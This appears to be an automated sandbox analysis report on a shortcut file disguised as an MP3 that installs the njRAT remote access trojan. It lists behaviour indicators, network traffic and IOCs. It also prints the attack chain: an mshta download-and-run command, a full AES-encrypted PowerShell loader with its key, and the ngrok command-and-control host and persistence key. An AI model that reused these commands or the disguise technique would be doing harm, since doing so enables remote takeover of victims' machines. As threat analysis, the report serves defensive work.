| File name: | juice wrld - toxic humans.mp3.lnk |
| Full analysis: | https://app.any.run/tasks/32142cd8-38d1-48ed-ae86-124d89338ab9 |
| Verdict: | Malicious activity |
| Threats: | njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world. |
| Analysis date: | July 06, 2024, 22:36:20 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=116, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized |
| MD5: | 8E53DFDAD2C77C0A241811B35443EE75 |
| SHA1: | 27FE546C8BAF968D307831FB881362B6C84F28DE |
| SHA256: | 70512319E99C2CEF7BFFA5250982174EDED06CC76311B13CC69C7959CA1C5245 |
| SSDEEP: | 24:8N+Zsx/Tff1efVKayWt9+/CWrrDAu7p9pEQCabpA:8/TX1e3ztCfAut9iQCat |
MALICIOUS
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 3200)
Run PowerShell with an invisible window
- powershell.exe (PID: 3652)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 3652)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 3884)
Drops the executable file immediately after the start
- powershell.exe (PID: 3884)
Connects to the CnC server
- nolies.exe (PID: 312)
NjRAT is detected
- nolies.exe (PID: 312)
NJRAT has been detected (SURICATA)
- nolies.exe (PID: 312)
NJRAT has been detected (YARA)
- nolies.exe (PID: 312)
SUSPICIOUS
Reads the Internet Settings
- mshta.exe (PID: 3200)
- powershell.exe (PID: 3884)
Adds/modifies Windows certificates
- mshta.exe (PID: 3200)
- powershell.exe (PID: 3884)
Suspicious use of symmetric encryption in PowerShell
- mshta.exe (PID: 3200)
Starts POWERSHELL.EXE for commands execution
- mshta.exe (PID: 3200)
- powershell.exe (PID: 3652)
Base64-obfuscated command line is found
- mshta.exe (PID: 3200)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 3200)
Cryptography encrypted command line is found
- powershell.exe (PID: 3652)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 3652)
Application launched itself
- powershell.exe (PID: 3652)
Writes data to a memory stream (POWERSHELL)
- powershell.exe (PID: 3652)
Using PowerShell to operate with local accounts
- powershell.exe (PID: 3884)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 3884)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 3884)
Executable content was dropped or overwritten
- powershell.exe (PID: 3884)
Contacting a server suspected of hosting an CnC
- nolies.exe (PID: 312)
Connects to unusual port
- nolies.exe (PID: 312)
Starts CMD.EXE for commands execution
- nolies.exe (PID: 312)
INFO
Reads Internet Explorer settings
- mshta.exe (PID: 3200)
Checks proxy server information
- mshta.exe (PID: 3200)
Gets data length (POWERSHELL)
- powershell.exe (PID: 3652)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 3652)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 3884)
Checks supported languages
- nolies.exe (PID: 312)
Disables trace logs
- powershell.exe (PID: 3884)
The executable file from the user directory is run by the Powershell process
- nolies.exe (PID: 312)
Reads Environment values
- nolies.exe (PID: 312)
Reads the machine GUID from the registry
- nolies.exe (PID: 312)
Reads the computer name
- nolies.exe (PID: 312)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
NjRat
(PID) Process(312) nolies.exe
C27.tcp.eu.ngrok.io
Ports19000
BotnetNYAN CAT
Options
Auto-run registry keySoftware\Microsoft\Windows\CurrentVersion\Run\97719017aea6
Splitter@!#&^%$
Version0.7NC
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, Description, RelativePath, CommandArgs, IconFile, Unicode |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | 116 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | powershell.exe |
| Description: | fuck |
| RelativePath: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| CommandLineArguments: | .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://tmpfiles.org/dl/8880298/grim.xxx |
| IconFileName: | shell32.dll |
Total processes
50
Monitored processes
6
Malicious processes
5
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 240 | cmd.exe /C Y /N /D Y /T 1 & Del "C:\Users\admin\AppData\Roaming\nolies.exe" | C:\Windows\System32\cmd.exe | — | nolies.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 312 | "C:\Users\admin\AppData\Roaming\nolies.exe" | C:\Users\admin\AppData\Roaming\nolies.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: HIGH Description: Exit code: 0 Version: 0.0.0.0 Modules
NjRat(PID) Process(312) nolies.exe C27.tcp.eu.ngrok.io Ports19000 BotnetNYAN CAT Options Auto-run registry keySoftware\Microsoft\Windows\CurrentVersion\Run\97719017aea6 Splitter@!#&^%$ Version0.7NC | |||||||||||||||
| 3200 | "C:\Windows\system32\mshta.exe" https://tmpfiles.org/dl/8880298/grim.xxx | C:\Windows\System32\mshta.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 3384 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://tmpfiles.org/dl/8880298/grim.xxx | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3652 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $MefzKNFg = 'AAAAAAAAAAAAAAAAAAAAAJEznIuqgNjt0rz51Lt5qPLPPbDRPYr63e4eRoagP2Vb0h6l4l5L6tpaVLlsixH9J1tlzWAyv2rK1wjhARq5JLPJXsm/GJmWR6q/TnzxbWStQq1U2SAmPYFYpU2KkYj1UMXO4eK1owuDHRrMwJAVXhcyOIcL82J7KBKFWSzUMvJZqG+Hsh/C09mqq4c/bcEuMGiOJ9I1kICd65mhRpa0Uu+HDpQ2M5QTZ9dwtYh5SThSA5VkW1ZWL5aQ+fbj9uBzfSbysEXnLrUOfYlF4njnMbPkZW815NtJ1lhOjrs0KviFCSSjCkD1HWI0TytUwEH5wJcIPMd0fzzbEKbmAuI4slmAkaj1S7j5Gkdk4fR38KbGztsOVW6XGTO1A9OKfgNM9nttkATZxTiBA/rEDZfvWbJb7BR+VRK7O+Ndy/NmcIkMzHLxIboWWu7bhe68iXsXd5tZ4vIsf2hpvexzD3NmYZMggITE2qlf7ntdIs83NiHxeE0nVsLMWxWf4KQgBXcWKNmbcY+Q7M4O/L55h0WlA8dOfXPCSq957tuRs5dXsLGztmfjFOwCM3anwqZ7r+m359N2alwpvmXIJt94dJJSs8Fh90vSlwIzd5ATHLAWnEqfM/9877xn2dcJuNwPOGf5mvhURAHA1Mx0dc1XgvxciuYr0Z44ZIL7GP4jw1smSYjHhbbKo8JGefWcC9IPUPGGdKdnhidbZPFVXmNpxd6+L8OZPS1zYfxi4vv+9+C5W9qjj9y8/xwndSmar5Ynghu+KThAdB30szdQLp5x+W37L9IJXEtpcLklPp+URXzIlgOeLOMlPOVA3EcrvE1dzLxqbTXq1D1Igo8VHB8/SIiLyS+yU4d49N4AlAXCVRq5Pkyi';$WKthbD = 'TlpFRmlpTmdoWkpTZnZEcHFLYmFoS2VjQW1yYnFmTVQ=';$dMgggHy = New-Object 'System.Security.Cryptography.AesManaged';$dMgggHy.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dMgggHy.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dMgggHy.BlockSize = 128;$dMgggHy.KeySize = 256;$dMgggHy.Key = [System.Convert]::FromBase64String($WKthbD);$Zmmqg = [System.Convert]::FromBase64String($MefzKNFg);$YYAoQReQ = $Zmmqg[0..15];$dMgggHy.IV = $YYAoQReQ;$jFjyVhDJz = $dMgggHy.CreateDecryptor();$lUFTbIwRe = $jFjyVhDJz.TransformFinalBlock($Zmmqg, 16, $Zmmqg.Length - 16);$dMgggHy.Dispose();$FfKtwbPn = New-Object System.IO.MemoryStream( , $lUFTbIwRe );$FKiFWZ = New-Object System.IO.MemoryStream;$cImsFFiho = New-Object System.IO.Compression.GzipStream $FfKtwbPn, ([IO.Compression.CompressionMode]::Decompress);$cImsFFiho.CopyTo( $FKiFWZ );$cImsFFiho.Close();$FfKtwbPn.Close();[byte[]] $ChuMB = $FKiFWZ.ToArray();$exQEXm = [System.Text.Encoding]::UTF8.GetString($ChuMB);$exQEXm | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3884 | "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
Total events
23 054
Read events
22 847
Write events
183
Delete events
24
Modification events
| (PID) Process: | (3384) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | ProxyServer |
Value: | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | ProxyOverride |
Value: | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | AutoConfigURL |
Value: | |||
| (PID) Process: | (3200) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | AutoDetect |
Value: | |||
Executable files
1
Suspicious files
23
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3200 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5 | SHA256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F | |||
| 3384 | powershell.exe | C:\Users\admin\AppData\Local\Temp\budjgok4.rga.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 3384 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
| 3200 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:822467B728B7A66B081C91795373789A | SHA256:AF2343382B88335EEA72251AD84949E244FF54B6995063E24459A7216E9576B9 | |||
| 3200 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61 | binary | |
MD5:9E0B1E8712FDC23211F35A0336F1E1D8 | SHA256:CFAAA5E324938EA22B7F192F4E161E13FB2277EE06A3A67B3002010D3D42E517 | |||
| 3200 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:29C7B0BB32B50980EF0400AA73A4B1FB | SHA256:7787A8A9DA6FE1B038D9BF21EDC1B3649241B1DF7B5E14C9808C5BE71F83F42C | |||
| 3200 | mshta.exe | C:\Users\admin\AppData\Local\Temp\TarEA0F.tmp | binary | |
MD5:4EA6026CF93EC6338144661BF1202CD1 | SHA256:8EFBC21559EF8B1BCF526800D8070BAAD42474CE7198E26FA771DBB41A76B1D8 | |||
| 3200 | mshta.exe | C:\Users\admin\AppData\Local\Temp\CabEA0E.tmp | compressed | |
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5 | SHA256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F | |||
| 3200 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\71E5IC7G.txt | text | |
MD5:EFBF337D0EB53D907EC1D3C22C8983AD | SHA256:DD5A1ADC6842A770C215A05D9E944BC44E37B38D43B7845371735959D70CA706 | |||
| 3200 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:75E089B20BB3AB49D08D184E664DF61C | SHA256:9C1097719A95F8836ABE45B7D758A253A09B05B1539803E5CAE76E8D8E45554F | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
16
DNS requests
9
Threats
5
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3200 | mshta.exe | GET | 304 | 217.20.58.100:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?4616b7fcbc5d4339 | unknown | — | — | unknown |
3200 | mshta.exe | GET | 200 | 217.20.58.100:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?f86e1ea6839ebb7a | unknown | — | — | unknown |
3200 | mshta.exe | GET | 200 | 69.192.161.44:80 | http://x1.c.lencr.org/ | unknown | — | — | unknown |
3200 | mshta.exe | GET | 200 | 69.192.161.44:80 | http://x2.c.lencr.org/ | unknown | — | — | unknown |
1060 | svchost.exe | GET | 304 | 199.232.210.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?60bcd71e49d094b3 | unknown | — | — | unknown |
1372 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
1372 | svchost.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2564 | svchost.exe | 239.255.255.250:3702 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1372 | svchost.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3200 | mshta.exe | 172.67.195.247:443 | tmpfiles.org | CLOUDFLARENET | US | unknown |
3200 | mshta.exe | 217.20.58.100:80 | ctldl.windowsupdate.com | — | US | unknown |
1060 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3200 | mshta.exe | 69.192.161.44:80 | x1.c.lencr.org | AKAMAI-AS | DE | unknown |
3884 | powershell.exe | 172.67.195.247:443 | tmpfiles.org | CLOUDFLARENET | US | unknown |
312 | nolies.exe | 3.68.56.232:19000 | 7.tcp.eu.ngrok.io | AMAZON-02 | DE | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
tmpfiles.org |
| malicious |
ctldl.windowsupdate.com |
| whitelisted |
x1.c.lencr.org |
| whitelisted |
x2.c.lencr.org |
| whitelisted |
7.tcp.eu.ngrok.io |
| malicious |
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1060 | svchost.exe | Misc activity | ET INFO DNS Query to a *.ngrok domain (ngrok.io) |
312 | nolies.exe | Malware Command and Control Activity Detected | ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) |
3 ETPRO signatures available at the full report